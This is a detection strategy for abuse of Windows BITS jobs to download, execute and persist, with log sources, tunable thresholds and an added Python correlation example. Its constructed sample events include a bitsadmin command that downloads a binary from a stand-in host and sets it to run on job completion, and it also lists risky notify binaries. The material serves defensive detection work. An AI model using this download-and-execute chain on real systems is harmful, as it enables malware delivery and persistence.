
DET0098 Detect abuse of Windows BITS Jobs for download, execution and persistence

| Item | Value |
|---|---|
| ID | DET0098 |
| Version | 1.0 |
| Created | 21 October 2025 |
| Last Modified | 21 October 2025 |

Technique Detected: T1197 (BITS Jobs)

Analytics

Windows

AN0274

Behavioral chain: (1) An actor creates or modifies a BITS job via bitsadmin.exe, PowerShell BITS cmdlets, or COM; (2) the job performs HTTP(S)/SMB network transfers while the owning user is logged on; (3) upon job completion/error, BITS launches a notify command (SetNotifyCmdLine) from svchost.exe -k netsvcs -s BITS, often establishing persistence by keeping long-lived jobs. The strategy correlates process creation, command/script telemetry, BITS-Client operational events, and network connections initiated by BITS.

Log Sources

| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | WinEventLog:Security | EventCode=4688 |
| Network Connection Creation (DC0082) | WinEventLog:Sysmon | EventCode=3, 22 |
| Command Execution (DC0064) | WinEventLog:PowerShell | EventCode=4103, 4104, 4105, 4106 |
| Service Creation (DC0060) | WinEventLog:System | EventCode=7036 |

Mutable Elements

| Field | Description |
|---|---|
| TimeWindow | Correlation window linking job creation, transfer, and notify execution (e.g., 30m–24h depending on environment and BITS retry behavior). |
| ExpectedUpdateHosts | Allow-list of corporate update/CDN endpoints that legitimately use BITS (WSUS, MEMCM, vendor updaters). |
| SuspiciousCliSwitches | BITSAdmin flags of interest (/transfer, /addfile, /SetNotifyCmdLine, /resume, /setcustomheaders, /setminretrydelay). |
| NotifyCmdBlockList | Known risky binaries or folders (e.g., %TEMP%\*.exe, powershell.exe, cmd.exe) used as BITS notify commands. |
| UserContext | Scope by interactive users, service accounts, or high-value targets (admins/servers) to reduce benign noise. |
| ExternalNetCIDRs | Definition of external/non-corp destinations for network correlation. |
| JobLifetimeThreshold | Maximum age or retry count for benign jobs before flagging persistence (e.g., >3 days or retry>20). |
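The following is an added example (not part of the DET0098 strategy or any MITRE tooling) that implements the three-stage correlation from the behavioral chain above over constructed sample events, with the tunables taken from the Mutable Elements table. The event records, host names, user name and file paths are all assumptions made up for the example; real telemetry would come from the Security 4688 and Sysmon 3 channels listed under Log Sources.

```python
from datetime import datetime, timedelta
# Tunables mirroring the strategy's Mutable Elements; the concrete values are assumptions.
SUSPICIOUS_CLI_SWITCHES = {"/transfer", "/addfile", "/setnotifycmdline", "/resume",
                           "/setcustomheaders", "/setminretrydelay"}
NOTIFY_CMD_BLOCKLIST = ("powershell.exe", "cmd.exe", "\\temp\\")   # lower-case substrings
EXPECTED_UPDATE_HOSTS = {"wsus.corp.example", "download.windowsupdate.com"}
BITS_SVCHOST = "svchost.exe -k netsvcs -s bits"                     # the BITS service host

def ts(s):
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")

# Constructed sample telemetry (not real logs). id 4688 = Security process creation,
# id 3 = Sysmon network connection. Only the fields the correlation needs are kept.
EVENTS = [
    {"t": ts("2025-10-21 09:00:00"), "id": 4688, "user": "alice", "parent": "cmd.exe",
     "image": "C:\\Windows\\System32\\bitsadmin.exe",
     "cmdline": "bitsadmin /transfer upd http://cdn.example.net/a.bin C:\\Users\\alice\\AppData\\Local\\Temp\\a.exe"},
    {"t": ts("2025-10-21 09:00:05"), "id": 4688, "user": "alice", "parent": "cmd.exe",
     "image": "C:\\Windows\\System32\\bitsadmin.exe",
     "cmdline": "bitsadmin /SetNotifyCmdLine upd C:\\Users\\alice\\AppData\\Local\\Temp\\a.exe NULL"},
    {"t": ts("2025-10-21 09:01:10"), "id": 3, "user": "SYSTEM", "dest": "cdn.example.net",
     "image": "C:\\Windows\\System32\\svchost.exe", "cmdline": "svchost.exe -k netsvcs -s BITS"},
    {"t": ts("2025-10-21 09:02:00"), "id": 4688, "user": "alice", "parent": "svchost.exe -k netsvcs -s BITS",
     "image": "C:\\Users\\alice\\AppData\\Local\\Temp\\a.exe", "cmdline": "a.exe"},
    # Benign: BITS fetching from an allow-listed update host, no job creation by a user.
    {"t": ts("2025-10-21 10:00:00"), "id": 3, "user": "SYSTEM", "dest": "wsus.corp.example",
     "image": "C:\\Windows\\System32\\svchost.exe", "cmdline": "svchost.exe -k netsvcs -s BITS"},
]

def cli_switches(cmdline):
    return {tok.lower() for tok in cmdline.split() if tok.startswith("/")}

def detect_bits_abuse(events, window_hours=24):
    """Alert once per chain: bitsadmin job -> non-allow-listed BITS transfer -> notify command, inside the window."""
    window, alerts, seen = timedelta(hours=window_hours), [], set()
    creations = [e for e in events if e["id"] == 4688
                 and e["image"].lower().endswith("bitsadmin.exe")
                 and cli_switches(e["cmdline"]) & SUSPICIOUS_CLI_SWITCHES]
    for c in creations:
        later = [e for e in events if c["t"] <= e["t"] <= c["t"] + window]
        transfers = [e for e in later if e["id"] == 3 and e["cmdline"].lower() == BITS_SVCHOST
                     and e["dest"] not in EXPECTED_UPDATE_HOSTS]
        notifies = [e for e in later if e["id"] == 4688 and e["parent"].lower() == BITS_SVCHOST
                    and any(b in e["image"].lower() for b in NOTIFY_CMD_BLOCKLIST)]
        for n in notifies:
            if transfers and (c["user"], n["t"]) not in seen:   # one alert per notify execution
                seen.add((c["user"], n["t"]))
                alerts.append({"user": c["user"], "job_cmd": c["cmdline"],
                               "dest": transfers[0]["dest"], "notify_cmd": n["image"]})
    return alerts
```

Shrinking `window_hours` below the gap between job creation and the transfer drops the alert, which is the trade-off the TimeWindow element describes: BITS retries can stretch the chain over many hours.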